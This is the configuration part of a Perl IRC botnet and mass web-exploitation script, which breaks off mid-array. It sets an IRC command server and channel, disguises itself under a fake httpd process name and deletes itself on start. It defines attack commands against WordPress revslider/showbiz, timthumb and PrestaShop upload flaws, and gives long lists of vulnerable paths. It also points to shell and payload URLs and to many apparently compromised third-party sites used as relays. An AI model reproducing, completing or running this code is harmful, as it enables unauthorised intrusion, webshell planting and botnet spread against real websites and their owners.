#!/usr/bin/perl use HTTP::Request; use HTTP::Request::Common; use HTTP::Request::Common qw(POST); use LWP::Simple; use HTTP::Cookies; use LWP 5.64; use LWP::UserAgent; use IO::Socket; use IO::Socket::INET; use IO::Select; use Socket; use MIME::Base64; use File::Basename; use URI::Escape; use Digest::MD5 qw(md5_hex); #use DBI; use HTTP::Cookies; ####################################################################### my $mageforce = 0; my $goomode = 1; my $spread = 1; my $cpxcheck = 1; my $sshcheck = 1; my $sqlview = 1; ####################################################################### my $datetime = localtime; my $fakeproc = "/usr/sbin/httpd -k admin"; my $ircserver = "161.129.153.142"; my $ircport = "443"; my $number = int(rand(99)); my $nickname = "xTeam112"; my $ident = "-"; my $channel = "#expinc"; my $chanxxx = "#exp_inc"; #my $base = "#exp_inc"; my $admin = "KosoWaR"; my $fullname = "$number"; my $nob0dy = "14$whoami"; my $searchlogo = "1"; my $rsqllogo = "1"; my $jdcmd = "!jo".$number.""; my $ninjacmd = "!ni".$number.""; my $hwcmd = "!h".$number.""; my $flexcmd = "!f".$number.""; my $mgcmd = "!sh".$number.""; my $mgcmd2 = "!sh2".$number.""; my $mgcmd3 = "!sh3".$number.""; my $kcfcmd = "!kfc".$number.""; my $revcmd = "!r".$number.""; my $phpcmd = "!pt".$number.""; my $prestacmd = "!p".$number.""; my $dolphincmd = "!d".$number.""; my $dzscmd = "!vid".$number.""; my $timcmd = "!t".$number.""; my $ihcmd = "!ih".$number.""; my $alphacmd = "!act".$number.""; my $foxcmd = "!fox".$number.""; my $aupcmd = "!aup".$number.""; my $mambotscmd = "!mam".$number.""; my $plogcmd = "!plog".$number.""; my $assetscmd = "!as".$number.""; my $portcmd = "!port".$number.""; my $pkpcmd = "!pkp".$number.""; my $b2jcmd = "!b2j".$number.""; my $lmscmd = "!lms".$number.""; my $drucmd = "!dru".$number.""; my $hdfcmd = "!hd".$number.""; my $uplcmd = "!up".$number.""; my $upl2cmd = "!upx".$number.""; my $plugin = ("revslider","showbiz"); my $action = "revslider_ajax_action"; my $action1 = "showbiz_ajax_action"; my $update_file = "revslider.zip"; my $update_file1 = "showbiz.zip"; my $timot = 10; my $timrid = "http://wordpress.com.orbitadventuretours.com/img.php"; my $md5rid = md5_hex($timrid); my $shellx = $timrid; my $hwdXpl = "http://djcaa.org/wp-admin/includes/injektor.php"; my $ppp = "http://img.youtube.com.rosahimmelblau.com/img.php"; my $botx = "http://ifeed.co.kr//wp-content/plugins/AB/doc.txt"; my $ftptest = "http://lppm.teknokrat.ac.id/media/system/js/ftptest.php"; my $sshtest = "http://lppm.teknokrat.ac.id/media/system/js/ftptest.php"; #"https://github.com/liushuzhao/sshtest.git"; #---------- Contact mocha for it my $cookietmp = "/tmp/LOTNOKXUM5HAM3C.temp"; my $injectorjd = "http://www.firb.br/firb/icons/injektor.php"; my $ngilang = "rm -rf"; qx($ngilang $0); my @bugpresta = ('/modules/advancedslider/file_upload.php','/modules/addthisplugin/file_upload.php','/modules/additionalproductstabs/file_upload.php','/modules/attributewizardpro/file_upload.php','/modules/vtemslideshow/uploadimage.php','/modules/homepageadvertise/uploadimage.php','/modules/simpleslideshow/uploadimage.php','/modules/columnadverts/uploadimage.php','/modules/homepageadvertise/uploadimage.php','/modules/productpageadverts/uploadimage.php','/modules/simpleslideshow/uploadimage.php','/modules/columnadverts2/uploadimage.php','/modules/realty/include/uploadimage.php','/modules/realty/evogallery/uploadimage.php','/modules/soopamobile/uploadimage.php','/modules/homepageadvertise/uploadimage.php','/modules/filesupload/upload.php','/module/resaleform/upload.php','/modules/megaproduct/'); my @bugxxx = ("/timthumb.php","/thumb.php","/_tbs.php","/thumbopen.php","/timthumb_ws.php","/_scripts/timthumb.php","/framework/includes/timthumb.php","/thumb/thumb.php","/library/timthumb.php","/backend/timthumb.php","/libraries/timthumb.php","/framework/plugins/timthumb.php","/lib/timthumb.php","/includes/timthumb.php","/theme/classes/timthumb.php","/framework/timthumb.php","/framework/thumb.php","/inc/thumb.php","/inc/timthumb.php","/core/thumb.php","/_assets/timthumb.php","/framework/scripts/timthumb.php","/themify/img.php","/themify/img_x.php","/scripts/timthumb.php","/script/timthumb.php","/lib/scripts/timthumb.php","/functions/timthumb.php","/thumbs/_tbs.php","/functions/thumb.php","/plugins/woo-tumblog/functions/thumb.php","/plugins/timthumb.php","/js/timthumb.php","/libs/timthumb.php","/php/timthumb.php","/tools/timthumb.php","/tools/pivotx/includes/timthumb.php","/img_resize/timthumb.php","/uploads/thumb-temp/timthumb.php","/lib/utils/timthumb.php","/lib/shortcodes/includes/timthumb.php","/lib_frame/thumb.php","/timthumb/timthumb.php","/fws/addons/timthumb/timthumb.php","/extensions/auto-thumb/timthumb.php","/assets/js/timthumb.php","/framework/lib/timthumb.php","/images/thumb.php","/options/thumbs.php"); my $wakil = "petology"; my $botsaver = "http://www.customframemalaysia.com/modules/aweber/.awebe.php"; my $shopliftxpl = "http://krasivyidom.kz/skin/conf.php"; my $ftpxpl = "".$hostxpl."ftp.php"; my $revxpl = "".$hostxpl."rev.php"; my $lfishell = "http://taovie.com/wp-content/plugins//bad.txt"; my $mag_shell = "rss.zip"; sub randomagent { my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'); my $random = $array[rand(scalar(@array))]; return($random); } my $useragent = &randomagent(); my @uagents = ( "Microsoft Internet Explorer/4.0b1 (Windows 95)","Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)","Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)","Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)","Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)","Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)","Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)","Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)","Mozilla/4.0 (compatible; MSIE 7.0b; Win32)","Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)","Microsoft Pocket Internet Explorer/0.6","Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)","MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)","Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)","Advanced Browser (http://www.avantbrowser.com)","Avant Browser (http://www.avantbrowser.com)","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)","Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)","Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)","Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511","Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0","Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox","Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4","Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4","Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1","Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2","Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b","Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0","Mozilla/3.0 (OS/2; U)","Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)","Mozilla/4.61 (Macintosh; I; PPC)","Mozilla/4.61 [en] (OS/2; U)","Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)","Mozilla/4.8 [en] (Windows NT 5.0; U)"); my $uagent = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6'); #my $jpath = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; my @go = ("dont be a looser man","all is easy if you want to learn","you must know who you are","exploit database","be a good man :d","if you cannot be intelligent, be a good man","Success is always accompanied with failure", "Do whatever you like, be consistent, and success will come naturally","An action is the foundation of a success","Think big, and act now","We can succeed if we learn from mistakes","Do your best at any moment that you have", "The Intelligent people can lose because of the tenacity of the fools","Your future is determined by what you start today","Stop dreaming and start doing","You are the creator for your own future","If opportunity does not come to you, then create it", "Practice makes right, repetitions make perfect"); my @pgfa = ( "?____pgfa=http%3A%2F%2Fwww.google.com%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.de%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.co.uk%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com.my%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com.sg%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.ru%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.ro%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.de%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.ca%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.fr%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.co.id%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.ru%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.fr%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.de%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com.my%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com.br%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com.br%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.co.uk%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.ne%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.co.mz%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com.sg%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com.mx%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.com.mx%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.de%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.ru%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.ro%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.co.id%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.at%2Fsearch?q=","?____pgfa=http%3A%2F%2Fwww.google.nl%2Fsearch?q="); #my @pgfa = ( "?____pgfa=http%3A%2F%2Fwww.google.com%2Fsearch?q="); my $pgfa = $pgfa[rand(scalar(@pgfa))]; my @lobex = ("http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://sellallmyideas.com/errors.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://exhibcouples.fr/errors.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://citizenofburma.org//plugins/content/errors.php", "http://treboliberica.com/includes/errors.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://centralcaixas.com/mdf/errors.php", "http://ecom.wilburhuang.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://gdthuyphuong.free.fr//includes/errors.php", "http://interminas.ddns.net/errors.php", "http://cnsave.koray.cn/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://shardha.in/errors.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://politics.cnm.com.pt/errors.php", "http://imotionasia.com.vn/errors.php", "http://tsat-dashboard.com/videocache/bypass.php", "http://www.mirabalcenter.org//errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.zsp.karpacz.pl//libraries/joomla/document/index.php", "http://automarket-fortuna.ru/errors.php", "http://virtual-aerospace.co.jp//errors.php", "http://www.pricepaving.com//wp-includes/js/plupload/index.php", "https://gpscsomagok.hu/skin/bypass.php", "http://www.studio-aid.it//libraries/joomla/database/index.php", "http://hoponhopoff.ge//errors.php", "http://metroway.com/wp-includes/ID3/proxy.php", "http://chaoscollective.in/administrator/components/com_weblinks/views/errors.php", "http://www.cannell-immobilier.com/errors.php", "http://www.alexgretter.com/google.php", "http://www.photodesign.uncanny.cz/images/error.php", "http://sufbellman.dk/media/error.php", "http://turkishonline.ru//media/system/js/error.php", "http://virtual-aerospace.co.jp/errors.php", "http://www.shturmovoi.ru/components/com_mailto/error.php", "http://www.rateavon.je/error.php", "http://circuitec.com.br/errors.php", "http://pngk.kz/media/media/css/index.php", "http://www.mariobabiera.com/google.php", "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php", "http://www.psdf.org.pk/errors.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://www.acdt-manutention.fr/errors.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://pnpdistribuidora.com.br//erros/errors.php", "http://clinicavanity.com.br/2012/wp-includes/error.php", "http://www.imc-egypt.org//cli/error.php", "http://pnpdistribuidora.com.br//errors.php", "http://www.karpet.cz/media/system/js/jquery.php", "http://www.baliste-club.org//media/errors.php", "http://gaysm.pl/media/errors.php", "http://www.semneartemis.ro/images/errors.php", "http://www.baskingshark.ie//media/errors.php", "http://representacoesdasa.com.br/wp-admin/errors.php", "http://ajansfestival.com/wp-admin/user/error.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://gaysm.pl/flash/modules/global/js/errors.php", "http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://oldfashionedman.com//errors.php", "http://www.shg-vaskulitis-eifel-mosel.de//forum/style/portal/error.php", "http://www.addisyouth.org.et/components/com_mailto/error.php", "http://tricotrico.com/wp-includes/error.php", "http://printfastt.com.br/errors.php", "http://www.gramophoneshop.nl/webshop//skin/frontend/default/errors.php", "http://www.skipperdean.com//media/errors.php", "http://prweb.com.sg/maimee/errors.php", "http://cmtactical.com//skin/install/default/default/errors.php", "http://www.lmcreativedesign.com.br/wp-content/plugins/errors.php", "https://www.aavamobile.com/modules/mod_search/index.php", "http://donghohanghieu.diemnhan.net//errors.php", "http://www.internetrights.in/wp-content/plugins/contact-form-7/images/service-icons/errors.php", "http://www.copati.org.br//images/jdownloads/screenshots/thumbnails/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://cccjamaica.org/cccj_main/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://pastorbonus.sk/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://younik.co/error.php", "http://candidfeet.org/clip//admin_area/charts/tmp-upload-images/error.php", "http://cichlid77.free.fr/errors.php", "http://www.liftmaxthailand.com/downloader/template/errors.php", "http://www.petcubes.com.sg/downloader/Maged/Connect/options-header.php", "http://www.liftmaxthailand.com/js/options-header.php", "http://fifacompet.free.fr/components/com_joomleague/assets/errors.php", "http://www.avzootice.cz/includes/js/index2.php", "http://gentleheart.cz/includes/js/index2.php", "http://www.voyage-cambodge.org//images/banners/error.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.dom-sad-ogorod.ru/plugins/search/config.inc.php", "http://www.bam.co.th/bam/corporate/xmlrpc/index2.php", "http://imotionasia.com.vn/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://www.ursaminorvehicles.com/errors/default/css/error.php", "http://patachou.com/js/lib/search.php", "http://www.energeticevolution.net/js/lib/search.php", "https://www.clematixdigital.com/errors/default/css/error.php", "http://www.mypgmee.com/media/catalog/product/2/error.php", "http://sales.luxxeen.com/errors/default/css/error.php", "http://www.exhibcouples.fr/errors.php", "http://www.tileandbathco.com/errors/default/css/error.php", "http://isnoffices.com/wp-content/themes/kim-remi/fonts/error.php", "http://chapmancycles.com/wp-admin/edit-link.php", "http://iweb365.co/errors/default/css/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://cccjamaica.org/cccj_main/media/mailto/error.php", "http://pngk.kz//logs/errors.php", "http://adoma.sk/errors.php", "http://www.veterinaigle.ch//media/errors.php", "http://dom-sad-ogorod.ru/plugins/search/config.inc.php", "http://king-solarman.com/skin/adminhtml/base/error.php", "http://www.techlane.com.sg/errors.php", "http://www.alvestaguesthouse.co.za/wp-content/themes/welcome_inn/cache/pro.php", "http://www.karpet.cz/media/system/js/jquery.php", "http://godreamsleepingbag.com/errors.php", "http://www.thaihospitalbed.com/var/locks/error.php", "http://www.eyeforce.com.tr/var/pass/search.php", "http://valentealexvalente.com/alex/wp-includes/error.php", "http://www.elado.ro//xmlrpc/error.php", "http://blog.eurostargym.com/wp-includes/js/thickbox/class-mail.php", "http://www.windfellows.org//plugins/editors/rokpad/error.php", "http://milesnation.com/whitney/css/error.php", "http://www.gardenmachinery.ie/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://www.telsonet.pl/errors.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://www.alexgretter.com/google.php", "http://www.pastorbonus.sk/errors.php", "http://www.cannell-immobilier.com/errors.php", "http://www.photodesign.uncanny.cz/images/error.php", "http://circuitec.com.br/errors.php", "http://www.theatresprives.com/errors.php", "http://sufbellman.dk/media/error.php", "http://www.mariobabiera.com/google.php", "http://dailyfresh.nu/errors.php", "http://virtual-aerospace.co.jp/errors.php", "http://deangelisviaggi.it/errors.php", "http://pastorbonus.sk/errors.php", "http://metroway.com/wp-includes/ID3/proxy.php", "http://www.psdf.org.pk/errors.php", "http://iheld.com/errors.php", "http://bohealth.eu/media/com_jantivirus/css/index.php", "http://printfastt.com.br/errors.php", "http://pngk.kz/media/media/css/index.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://www.shturmovoi.ru/components/com_mailto/error.php", "http://www.kawaiishop.fr/var/pass/search.php", "http://lisarkent.com/errors.php", "http://savvyschools.ie/wp-includes/images/pass/script-loader.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://blizzsozz.com/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://turkishonline.ru//media/system/js/error.php", "http://chaoscollective.in/administrator/components/com_weblinks/views/errors.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.mirabalcenter.org//errors.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.pricepaving.com//wp-includes/js/plupload/index.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.zsp.karpacz.pl//libraries/joomla/document/index.php", "http://www.studio-aid.it//libraries/joomla/database/index.php", "http://www.immobilienparaguay.com.py//templates/error.php", "http://muckrossparkcollege.com//plugins/editors/tinymce/error.php", "http://belarus-theatre.net/error.php", "http://www.decret-pinel.fr/wp-includes/error.php", "http://howfarbooks.com//images/stories/errors.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://interminas.ddns.net/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://exhibcouples.fr/errors.php", "http://www.kathleenferrari.com/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://australiansuperaudit.com.au/errors.php", "http://komunikacyjni.pl/wp-content/calander-date.php", "http://austriasport.nl/wp-includes/errors.php", "http://www.conac.cl/errors.php", "http://www.sci.kmutnb.ac.th/web/components/com_mailto/error.php", "http://beghellichina.com//media/system/js/error.php", "http://www.iek.kol.pl//media/system/css/error.php", "http://www.esteticaraffinata.com.br/errors.php", "http://www.studiofifteen.in/errors.php", "http://www.ibi.edu.au/includes/error.php", "http://www.omacmortgages.ie/error.php", "http://www.h-herms.es/wp-includes/error.php", "http://erofeydv.ru/wp-includes/error.php", "http://madmanslay.free.fr/administrator/components/com_content/views/element/errors.php", "http://www.jourdets.com/piwik/libs/open-flash-chart/tmp-upload-images/error.php", "http://clinicavanity.com.br/2012/wp-includes/error.php", "http://www.bigswedestudios.com/errors.php", "http://www.isidarbink.lt/errors.php", "http://akcnibazar.cz/errors.php", "https://www.mypgmee.com/media/catalog/product/2/error.php", "http://www.mypgmee.com/media/catalog/product/2/search.php", "http://www.pastryideas.gr/skin/frontend/search.php", "http://www.rmk.te.ua//components/com_content/models/google.php", "http://www.lafutbolera.net/images/error.php", "http://www.pece.com.my/2014/wp-content/themes/Avada/framework/error.php", "http://www.ares-asesores.com/ares/wp-content/languages/error.php", "http://member.marketingbodz.com/error.php", "http://kontento.eu/wp-content/themes/smartbox-theme/error.php", "http://www.oldfashionedman.com/errors.php", "citizenofburma.org//plugins/content/errors.php", "http://choir.louwanjpoujezi.org//plugins/content/errors.php", "http://gdthuyphuong.free.fr//includes/errors.php", "http://cnsave.koray.cn/errors.php", "http://ecom.wilburhuang.com/errors.php", "http://centralcaixas.com/mdf/errors.php", "http://shardha.in/errors.php", "http://automarket-fortuna.ru/errors.php", "http://tsat-dashboard.com/videocache/bypass.php", "http://zend.secl.com.ua/media/bypass.php", "https://gpscsomagok.hu/skin/bypass.php", "http://hoponhopoff.ge//errors.php", "http://virtual-aerospace.co.jp//errors.php", "http://www.rotarymowers.com.au/skin/errors.php", "http://www.travelpointer.ro//wp-includes/js/plupload/index.php", "http://www.atopsuccess.com//plugins/editors/error.php", "http://www.pkstorages.com//plugins/content/seka.php", "http://www.rateavon.je/error.php", "http://dateakademie.de/wp-includes/error.php", "http://themansphere.com/wp-includes/error.php", "http://hoponhopoff.ge/errors.php", "http://directproducts.co.zw/errors.php", "http://www.acdt-manutention.fr/errors.php", "http://www.semneartemis.ro/images/errors.php", "http://pnpdistribuidora.com.br//erros/errors.php", "http://www.imc-egypt.org//cli/error.php", "http://pnpdistribuidora.com.br//errors.php", "http://secureindia.us/wp-admin/errors.php", "http://www.guliziagraphics.com/includes/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.alexgretter.com/google.php", "http://www.schilddruesenzentrum-wuerzburg.de/google.php", "http://www.rmk.te.ua//components/com_content/models/google.php", "http://belarus-theatre.net/error.php", "http://www.austriasport.nl/wp-includes/errors.php", 